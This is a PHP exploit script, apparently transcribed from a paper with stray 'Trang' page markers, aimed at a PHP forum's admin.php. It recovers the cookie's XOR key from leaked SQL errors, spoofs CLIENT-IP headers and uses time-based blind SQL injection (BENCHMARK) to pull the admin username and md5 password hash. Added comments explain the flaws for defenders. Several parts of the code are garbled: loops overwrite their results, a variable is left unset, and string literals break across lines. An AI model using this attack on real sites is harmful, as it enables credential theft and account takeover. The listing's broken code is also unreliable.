
// Progress message printed before any request is issued.
echo "please wait \n";

// XOR-based obfuscation keyed by $GLOBALS['my_fragment'] (set elsewhere in
// the script). With $action 'ENCODE' the XORed bytes are base64-encoded on
// return; any other $action is treated as DECODE: the input is base64-decoded
// first and the XORed bytes are returned raw.
// Security note: XOR with a static key gives no integrity protection, so a
// server that trusts a cookie encoded this way cannot tell a forged value from
// a genuine one; cookie contents should be authenticated (e.g. an HMAC) rather
// than merely obfuscated.
function StrCode($string,$action='ENCODE'){

$key = $GLOBALS['my_fragment'];

$string = $action == 'ENCODE' ? $string : base64_decode($string);

// Assigned but never read in this function.
$len = 18;

$code = '';

// NOTE(review): as transcribed, $k is never assigned in this function and the
// loop body overwrites $code instead of appending to it, so only a single byte
// is produced; the listing appears garbled here.
for($i=0; $i<strlen($string); $i++){

$code = $string[$i] ^ $key[$k];

}

$code = $action == 'DECODE' ? $code : base64_encode($code); return $code;

}

// Intended to return $length characters drawn from the lowercase hex alphabet;
// used below to pick trial keys for StrCode(). mt_srand() is reseeded from
// microtime() on every call, which is a weak, guessable seed -- mt_rand() is
// not suitable for anything security sensitive in any case.
// NOTE(review): as transcribed the loop overwrites $hash instead of appending,
// so only the final character is returned whatever $length is.
function random($length) {

$hash = '';

$chars = '0123456789abcdef';

$max = strlen($chars) - 1;

mt_srand((double)microtime() * 1000000);

for($i = 0; $i < $length; $i++) {

$hash = $chars[mt_rand(0, $max)];

}

return $hash;

}

// True when the trimmed $fragment begins with 18 lowercase hex characters.
// The pattern has no end anchor, so longer strings also pass. ereg() was
// deprecated in PHP 5.3 and removed in PHP 7.
function is_my_key($fragment)

{

if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;}

else {return false;}

}

//need cookie prefix

// Hand-built HTTP/1.0 request for index.php; $p (path) and $host are defined
// earlier in the script, outside this excerpt.
$packet ="GET ".$p."index.php HTTP/1.0\r\n";

// The CLIENT-IP header carries a syntactically invalid address. Defender
// note: client-supplied IP headers must never be trusted for access control
// or audit logging; record the transport-level peer address instead.
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof

$packet.="Host: ".$host."\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";


// sendpacketii() is defined outside this excerpt; from the code below it
// appears to leave the response in $html.
sendpacketii($packet);

// Cookie name prefix: the text between "Set-Cookie: " and "lastfid=" in the
// response. $temp2[1] is used without checking that the split produced it.
$temp=explode("lastfid=",$html);

$temp2=explode("Set-Cookie: ",$temp[0]);

$cp=$temp2[1];

echo "cookie prefix -> ".$cp."\n";

// $e is set outside this excerpt; when it is false the script first recovers
// the XOR key used by StrCode(), otherwise that step is skipped.
if (!$e)

{

//see sql errors you need a valid key for strcodeii() function,

//so let's ask :)

// Probe string: a tab followed by every byte value 1..255.
$tt="\t";for ($i=1; $i<=255; $i++){$tt.=chr($i);}

// Resend the probe under random 18-hex-char keys until the server's SQL error
// text echoes a 255-byte username fragment back.
// Defender note: the leak relied on here is the application returning the
// failing SQL statement, including the decoded cookie value, in the response
// body; database error details must never be sent to the client.
while (1)

{

$GLOBALS['my_fragment']=random(18);

$au=StrCode($tt,"ENCODE");

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof

$packet.="Host: ".$host."\r\n";

// Cookie name is the prefix recovered above plus "AdminUser".
$packet.="Cookie: ".$cp."AdminUser=".$au.";\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$html=html_entity_decode($html);

$html=str_replace("<br />","",$html);

if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){

$temp=explode("WHERE username='",$html);

$temp2=explode("'<br>",$temp[1]);

$decoded=$temp2[0];

if (strlen($decoded)==255) break;

}

}

$decoded="\t".$decoded;

$temp = $au;

//calculating key

// For each of the 18 key positions, try candidate byte values; a candidate is
// kept when decoding with it reproduces the byte the server echoed at that
// position. The inner loop stops at 254, so byte value 255 is never tried,
// and == is a loose comparison.
$key="";

for ($j=0; $j<18; $j++){

Trang 3

for ($i=0; $i<255; $i++){

$aa="";

// $aa pads the candidate key with $j filler characters, presumably so that
// chr($i) sits at key position $j -- TODO confirm against StrCode().
if ($j<>0){

for ($k=1; $k<=$j; $k++){

$aa.="a";

}

}

$GLOBALS['my_fragment']=$aa.chr($i);

$t = StrCode($temp,"DECODE");

if ($t[$j]==$decoded[$j]){

$key.=chr($i);

}

}

}

// Accept the result only if it looks like an 18-character hex key.
if (is_my_key($key)){

echo "encryption key ->".$key."\n";

$GLOBALS['my_fragment']=$key;

}

else

{die("unable to retrieve the magic key ");}

}

// Candidate byte values for the password characters: NUL (terminator) plus the
// digits 0-9 and a-f, i.e. an md5 hex string is expected (see is_hash()).
$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

// Time-based blind extraction: one character position ($j) per outer
// iteration, stopping once a NUL is appended.
// Defender note: the signal is the response delay from BENCHMARK() inside the
// injected condition; the root cause is SQL built from a client-controlled
// cookie value. Use parameterised queries -- the "magic quotes" escaping
// mentioned below is bypassed because the value arrives base64-encoded.
$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

//you can use every char because of base64_decode() so this bypass magic quotes

// $b (benchmark iteration count) is defined outside this excerpt. "be nchmark"
// contains a space as transcribed.
$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),be nchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";

echo "sql -> ".$sql."\n";

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

Trang 4

$packet.="CLIENT-IP: 1.2.3.4\r\n";

$packet.="Host: ".$host."\r\n";

// As transcribed this header literal spans a line break, which would break
// the request; presumably a single line in the original listing.
$packet.="Cookie:

".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

// $data is defined outside this excerpt.
$packet.=$data;

// The request is sent twice: once untimed, then again between two time()
// samples (1-second resolution).
sendpacketii($packet);

usleep(2000000);

$starttime=time();

echo "starttime -> ".$starttime."\r\n";

sendpacketii($packet);

// A help-page response means the injected statement did not match this
// version of the target application.
if (eregi("You Can Get Help In",$html)) {

die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version ");

}

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

// $timeout is defined outside this excerpt. The echo literal below spans a
// line break as transcribed.
if ($difftime > $timeout) {$password.=chr($i);echo "password ->

".$password."[???]\r\n";sleep(2);break;}

}

// Reaching 255 without a timing hit means no candidate matched.
if ($i==255) {

die("\nExploit failed ");

}

}

$j++;

}

// Same time-based loop as for the password, now against the username column.
// Unlike the password loop there is no in_array() candidate filter (all 256
// byte values are tried) and no "You Can Get Help In" version check.
$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

// "be nchmark" contains a space as transcribed; $b is defined outside this
// excerpt.
$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),be nchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";

echo "sql -> ".$sql."\n";

Trang 5

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

$packet.="CLIENT-IP: 1.2.3.4\r\n";

$packet.="Host: ".$host."\r\n";

// Header literal spans a line break as transcribed, and the following line
// holds two statements.
$packet.="Cookie:

".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; $packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

// $data is defined outside this excerpt.
$packet.=$data;

// Sent twice: once untimed, then between two time() samples (1-second
// resolution).
sendpacketii($packet);

usleep(2000000);

$starttime=time();

echo "starttime -> ".$starttime."\r\n";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

// $timeout is defined outside this excerpt. The echo literal below spans a
// line break as transcribed.
if ($difftime > $timeout) {$admin.=chr($i);echo "admin ->

".$admin."[???]\r\n";sleep(2);break;}

// Reaching 255 without a timing hit means no byte value matched.
if ($i==255) {

die("\nExploit failed ");

}

}

$j++;

}

// True when the trimmed $hash begins with 32 lowercase hex characters (an md5
// hex digest). No end anchor, so longer strings also pass; ereg() was removed
// in PHP 7.
function is_hash($hash)

{

if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

else {return false;}

}

if (is_hash($password)) {

print_r('

-

admin user -> '.$admin.'

pwd hash (md5) -> '.$password.'

-

');
